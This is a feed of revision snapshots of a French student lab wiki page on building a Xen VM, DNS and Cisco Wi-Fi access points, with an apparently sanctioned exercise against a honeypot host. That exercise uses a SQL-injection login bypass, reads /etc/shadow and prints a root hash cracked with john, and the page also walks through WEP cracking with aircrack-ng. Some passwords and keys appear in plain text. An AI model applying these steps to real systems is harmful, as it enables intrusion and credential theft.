&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Creer le fichier  etc/phpmyadmin/config-db.php&lt;br /&gt;
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : &lt;br /&gt;
 &amp;lt;?php&lt;br /&gt;
 ##&lt;br /&gt;
 ## database access settings in php format&lt;br /&gt;
 ## automatically generated from /etc/dbconfig-common/phpmyadmin.conf&lt;br /&gt;
 ## by /usr/sbin/dbconfig-generate-include&lt;br /&gt;
 ##&lt;br /&gt;
 ## by default this file is managed via ucf, so you shouldn't have to&lt;br /&gt;
 ## worry about manual changes being silently discarded.  *however*,&lt;br /&gt;
 ## you'll probably also want to edit the configuration file mentioned&lt;br /&gt;
 ## above too.&lt;br /&gt;
 ##&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='gencovid19';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306';&lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ &lt;br /&gt;
connexion id : root&lt;br /&gt;
mdp: gencovid19&lt;br /&gt;
&lt;br /&gt;
une fois connecter on recherche les identifiants des utilisateurs ssh :&lt;br /&gt;
id = rex &lt;br /&gt;
mdp: &lt;br /&gt;
&lt;br /&gt;
connexion ssh : ssh rex@honey.plil.info&lt;br /&gt;
 /etc/shadow pour trouver la cle de cryptage du mdp root &lt;br /&gt;
 copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::&lt;br /&gt;
 installation de john &lt;br /&gt;
 john nom du fichier&lt;br /&gt;
&lt;br /&gt;
pour aller plus rapidement creer un dictionnaire a partir des indices donnés  : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'&lt;br /&gt;
utiliseer crunch?&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
&lt;br /&gt;
On utilise le paquet aircrack-ng.&lt;br /&gt;
&lt;br /&gt;
La commande&lt;br /&gt;
 airmon-ng&lt;br /&gt;
permet de voir le nom du réseau sans fil: wlan0mon&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On scanne les réseaux :&lt;br /&gt;
 airodump-ng --encrypte wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.&lt;br /&gt;
&lt;br /&gt;
photo&lt;br /&gt;
&lt;br /&gt;
On lance avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -z testwep-01.cap&lt;br /&gt;
&lt;br /&gt;
photo&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53808</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53808"/>
				<updated>2020-11-16T17:17:13Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
== Activation connexion ssh ==&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente la ligne PermissionRoot :  &lt;br /&gt;
 # Authentication:&lt;br /&gt;
 #LoginGraceTime 2m&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis on l'active avec la commande :&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
=== Sur Gandi ===&lt;br /&gt;
&lt;br /&gt;
Achat d'un nom de domaine : girolle.site&lt;br /&gt;
Création d'un Glue Record : 193.48.57.182&lt;br /&gt;
&lt;br /&gt;
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)&lt;br /&gt;
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)&lt;br /&gt;
&lt;br /&gt;
=== Sur la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Installation de bind9&lt;br /&gt;
On modifie les fichiers dans /etc/bind/named.conf.&lt;br /&gt;
Dans /etc/bind/named.conf.options&lt;br /&gt;
 options {&lt;br /&gt;
   directory &amp;quot;/etc/bind&amp;quot;;&lt;br /&gt;
   listen-on-v6 { any; };&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;girolle.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;girolle.site/girolle&amp;quot;;&lt;br /&gt;
   allow-transfer (217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans db.girolle.site&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.girolle.site.  postmaster.girolle.site(&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.girolle.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.182&lt;br /&gt;
 @       IN      MX      100 girolle.site.&lt;br /&gt;
&lt;br /&gt;
Puis pour le relancer :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration pour la réception du mail de confirmation du certificat SSL&lt;br /&gt;
Installer Postfixe pour avoir accès au fichier aliases&lt;br /&gt;
 Internet Site&lt;br /&gt;
 girolle.site&lt;br /&gt;
&lt;br /&gt;
Dans /etc/aliases&lt;br /&gt;
 admin: root&lt;br /&gt;
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site&lt;br /&gt;
&lt;br /&gt;
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Commandes et verifications /&lt;br /&gt;
ap(config)#interface BVI1&lt;br /&gt;
ap(config-if)# ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
ap(config-if)#exit&lt;br /&gt;
ap#write&lt;br /&gt;
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION&lt;br /&gt;
ap#ping 10.60.100.2 &lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:&lt;br /&gt;
.!!!!&lt;br /&gt;
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
test second routeur : ne fonctionne pas car pas d'addresse ip&lt;br /&gt;
ap#ping 10.60.100.1&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:&lt;br /&gt;
.....&lt;br /&gt;
Success rate is 0 percent (0/5)&lt;br /&gt;
&lt;br /&gt;
Configurer l'adresse par defaut:&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2&lt;br /&gt;
ap(config)#exit&lt;br /&gt;
ap#sh ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Test ping notre machine virtuelle girolle : &lt;br /&gt;
ap#ping 193.48.57.182&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:&lt;br /&gt;
!!!!!&lt;br /&gt;
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Creer le fichier  etc/phpmyadmin/config-db.php&lt;br /&gt;
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : &lt;br /&gt;
 &amp;lt;?php&lt;br /&gt;
 ##&lt;br /&gt;
 ## database access settings in php format&lt;br /&gt;
 ## automatically generated from /etc/dbconfig-common/phpmyadmin.conf&lt;br /&gt;
 ## by /usr/sbin/dbconfig-generate-include&lt;br /&gt;
 ##&lt;br /&gt;
 ## by default this file is managed via ucf, so you shouldn't have to&lt;br /&gt;
 ## worry about manual changes being silently discarded.  *however*,&lt;br /&gt;
 ## you'll probably also want to edit the configuration file mentioned&lt;br /&gt;
 ## above too.&lt;br /&gt;
 ##&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='gencovid19';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306';&lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ &lt;br /&gt;
connexion id : root&lt;br /&gt;
mdp: gencovid19&lt;br /&gt;
&lt;br /&gt;
une fois connecter on recherche les identifiants des utilisateurs ssh :&lt;br /&gt;
id = rex &lt;br /&gt;
mdp: &lt;br /&gt;
&lt;br /&gt;
connexion ssh : ssh rex@honey.plil.info&lt;br /&gt;
 /etc/shadow pour trouver la cle de cryptage du mdp root &lt;br /&gt;
 copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::&lt;br /&gt;
 installation de john &lt;br /&gt;
 john nom du fichier&lt;br /&gt;
&lt;br /&gt;
pour aller plus rapidement creer un dictionnaire a partir des indices donnés  : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'&lt;br /&gt;
utiliseer crunch?&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
&lt;br /&gt;
On utilise le paquet aircrack-ng.&lt;br /&gt;
&lt;br /&gt;
La commande&lt;br /&gt;
 airmon-ng&lt;br /&gt;
permet de voir le nom : wlan0mon&lt;br /&gt;
&lt;br /&gt;
airrrrrodump-ng --encrypte&lt;br /&gt;
&lt;br /&gt;
rr&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53741</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53741"/>
				<updated>2020-11-16T15:45:44Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
== Activation connexion ssh ==&lt;br /&gt;
&lt;br /&gt;
Modifier le fichier /etc/ssh/sshd_config&lt;br /&gt;
On décommente pour mettre :&lt;br /&gt;
 PermetRootLogin yes&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
=== Sur Gandi ===&lt;br /&gt;
&lt;br /&gt;
Achat d'un nom de domaine : girolle.site&lt;br /&gt;
Création d'un Glue Record : 193.&lt;br /&gt;
&lt;br /&gt;
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)&lt;br /&gt;
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)&lt;br /&gt;
&lt;br /&gt;
=== Sur la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Installation de bind9&lt;br /&gt;
On modifie les fichiers dans /etc/bind/named.conf.&lt;br /&gt;
Dans /etc/bind/named.conf.option&lt;br /&gt;
 options {&lt;br /&gt;
   directory &amp;quot;/etc/bind&amp;quot;;&lt;br /&gt;
   listen-on-v6 { any; };&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Commandes et verifications /&lt;br /&gt;
ap(config)#interface BVI1&lt;br /&gt;
ap(config-if)# ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
ap(config-if)#exit&lt;br /&gt;
ap#write&lt;br /&gt;
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION&lt;br /&gt;
ap#ping 10.60.100.2 &lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:&lt;br /&gt;
.!!!!&lt;br /&gt;
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
test second routeur : ne fonctionne pas car pas d'addresse ip&lt;br /&gt;
ap#ping 10.60.100.1&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:&lt;br /&gt;
.....&lt;br /&gt;
Success rate is 0 percent (0/5)&lt;br /&gt;
&lt;br /&gt;
Configurer l'adresse par defaut:&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2&lt;br /&gt;
ap(config)#exit&lt;br /&gt;
ap#sh ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Test ping notre machine virtuelle girolle : &lt;br /&gt;
ap#ping 193.48.57.182&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:&lt;br /&gt;
!!!!!&lt;br /&gt;
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==SSH==&lt;br /&gt;
 nano /etc/ssh/sshd_config&lt;br /&gt;
On decommente la ligne PermissionRoot:  &lt;br /&gt;
 # Authentication:&lt;br /&gt;
 #LoginGraceTime 2m&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service sshd restart&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Creer le fichier  etc/phpmyadmin/config-db.php&lt;br /&gt;
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : &lt;br /&gt;
 &amp;lt;?php&lt;br /&gt;
 ##&lt;br /&gt;
 ## database access settings in php format&lt;br /&gt;
 ## automatically generated from /etc/dbconfig-common/phpmyadmin.conf&lt;br /&gt;
 ## by /usr/sbin/dbconfig-generate-include&lt;br /&gt;
 ##&lt;br /&gt;
 ## by default this file is managed via ucf, so you shouldn't have to&lt;br /&gt;
 ## worry about manual changes being silently discarded.  *however*,&lt;br /&gt;
 ## you'll probably also want to edit the configuration file mentioned&lt;br /&gt;
 ## above too.&lt;br /&gt;
 ##&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='gencovid19';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306';&lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ &lt;br /&gt;
connexion id : root&lt;br /&gt;
mdp: gencovid19&lt;br /&gt;
&lt;br /&gt;
une fois connecter on recherche les identifiants des utilisateurs ssh :&lt;br /&gt;
id = rex &lt;br /&gt;
mdp: &lt;br /&gt;
&lt;br /&gt;
connexion ssh : ssh rex@honey.plil.info&lt;br /&gt;
 /etc/shadow pour trouver la cle de cryptage du mdp root &lt;br /&gt;
 copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::&lt;br /&gt;
 installation de john &lt;br /&gt;
 john nom du fichier&lt;br /&gt;
&lt;br /&gt;
pour aller plus rapidement creer un dictionnaire a partir des indices donnés  : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'&lt;br /&gt;
utiliseer crunch?&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53108</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53108"/>
				<updated>2020-11-02T17:48:25Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
